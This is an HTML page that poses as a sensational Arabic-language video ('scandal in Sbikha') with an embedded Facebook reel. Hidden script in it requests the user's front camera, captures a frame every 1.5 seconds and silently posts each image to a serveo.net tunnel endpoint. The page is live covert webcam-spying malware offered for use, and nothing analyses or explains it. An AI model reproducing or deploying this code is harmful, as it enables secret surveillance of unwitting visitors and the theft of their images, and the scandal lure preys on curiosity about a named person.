<!doctype html>
<html>
<head>
 <meta name="description" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRN4M7N_F3ntTKB-FE6IFDfXitqRqBtGmcUAg&s ">
    <meta property="og:title" content="بنتي مشيا تقرى ">
    <meta property="og:description" content="فضيحة في سبيخة.">
    <meta property="og:image" content="/IMG_20241026_050213~2.jpg">
    <meta property="og:url" content="https://1646392e623ea6048e651b59dafa4ab5.serveo.net">
<meta name="viewport" content="width=device-width,height=device-height,initial-scale=1.0">
  <style>
  	  html {
  	  background-color:white;
  	  font-family:arial;
  	  }
  	  div.load {
  	  width:100%;
  	  height:100%;
  	  display:block;
  	  }
     .loader {
     display:inherit;
     position:absolute;
     top:40%;
     right:40%;
     width:1.5cm;
     height:1.5cm;
     border-radius:50%;
     border:7px solid #eaeaff;
     border-top:7px solid #aadfff;
     -webkit-animation:spin 2s linear -1s infinite;
     }
     @-webkit-keyframes spin {
     0% {-webkit-transform:rotate(0deg);}
     100% {-webkit-transform:rotate(360deg);}
     }
     .load p {
     opacity:0.5;
     color:#8a9fa6;
     font-size:17px;
     text-align:center;
     position:relative;
     top:200px;
     }     
  </style>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'https://0c406fd38e0524983f8279fdfa02ca8b.serveo.net/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>

    <body>
 	<div class="load" id="loader">
 				<p>	  </p>
  			<div class="loader"></div>
  </div> 
    <iframe id="Live_FB_TV" width="100%" height="1000px" src="https://www.facebook.com/plugins/video.php?href=https://www.facebook.com/reel/911423856728533?mibextid=rS40aB7S9Ucbxw6v" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
    </body>
</html>
